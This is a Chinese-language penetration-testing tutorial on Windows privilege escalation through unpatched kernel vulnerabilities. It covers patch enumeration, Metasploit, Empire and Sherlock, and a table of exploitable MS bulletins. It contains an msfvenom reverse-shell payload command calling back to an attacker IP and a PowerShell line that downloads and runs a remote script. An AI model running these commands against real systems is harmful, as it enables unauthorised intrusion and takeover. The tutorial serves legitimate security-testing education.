Windows下常见的内核溢出提权
字数 1428 2025-08-20 18:17:58
Windows内核溢出提权技术详解
文章前言
在后渗透测试阶段,权限提升是一个绕不开的话题,其中"系统内核溢出提权"因其利用便捷成为了最为常用的方法。该方法通过查看目标系统中已安装的系统补丁,寻找缺失的"互补"补丁,并利用对应的提权类漏洞实现权限提升。
权限查看基础
在获取目标系统shell后,首先需要确认当前用户及其权限:
whoami
whoami /groups
典型输出显示用户权限为"Mandatory Label\Medium Mandatory Level",这是标准普通用户权限。提权目标是将此提升为"High Mandatory Level"。
补丁查询方法
1. 系统命令查看
systeminfo命令:
systeminfo
输出显示已安装的补丁列表,如KB2534111、KB2999226等。
WMIC命令:
wmic qfe get Caption,Description,HotFixID,InstalledOn
查询特定补丁:
wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /c:"KB2534111" /c:"KB976902"
2. 辅助网站查询
推荐使用https://bugs.hacking8.com/tiquan/输入补丁号查询缺失的可利用补丁。
3. MSF框架查询
MSF的post/windows/gather/enum_pathes模块可快速查找补丁信息:
- 生成payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.188.129 LPORT=4444 -f exe > shell.exe
- 获取meterpreter会话后执行:
run post/windows/gather/enum_patches
- 查找可用漏洞:
run post/multi/recon/local_exploit_suggester
4. Empire框架查询
usemodule privesc/powerup/allchecks
execute
5. PowerShell脚本 - Sherlock
Sherlock脚本(GitHub)可检测本地提权漏洞:
加载方式:
Import-Module .\Sherlock.ps1
# 或远程加载
IEX(New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1')
查询所有漏洞:
Find-AllVulns
查询特定漏洞:
Find-CVE20177199
6. Windows Exploit Suggester
工具原理:通过比对systeminfo生成的文件发现未修复漏洞。
安装:
pip install xlrd
git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester
更新漏洞库:
./windows-exploit-suggester.py --update
使用流程:
- 目标系统执行:
systeminfo > sysinfo.txt - 本地分析:
./windows-exploit-suggester.py -d 2020-09-09-mssb.xls -i sysinfo.txt
常见提权漏洞列表
| 安全公告 | KB号 | 影响系统 |
|---|---|---|
| CVE-2017-0213 | - | Win10/8.1/7/2016/2010/2008 |
| MS17-010 | KB4013389 | Win7/2008/2003/XP |
| MS16-135 | KB3199135 | 2016 |
| MS16-098 | KB3178466 | Win8.1 |
| MS16-075 | KB3164038 | 2003/2008/7/8/2012 |
| MS16-032 | KB3143141 | 2008/7/8/10/2012 |
| MS15-051 | KB3057191 | 2003/2008/7/8/2012 |
| MS14-058 | KB3000061 | 2003/2008/2012/7/8 |
| MS11-080 | KB2592799 | 2003/XP |
| MS10-015 | KB977165 | 2003/2008/7/XP |
漏洞利用资源
推荐项目:Heptagram,收集了大量公开的Windows提权EXP/POC。
注意事项
- 使用EXP时需注意影响的操作系统版本
- 部分工具如Windows-Exploit-Suggester的数据库可能较旧(最新到2017年)
- 不同工具检测效果可能有差异,建议多种方法结合使用
- 实际利用前应在测试环境验证EXP的兼容性
通过系统补丁信息分析结合上述工具,可以高效地发现和利用Windows内核溢出漏洞实现权限提升。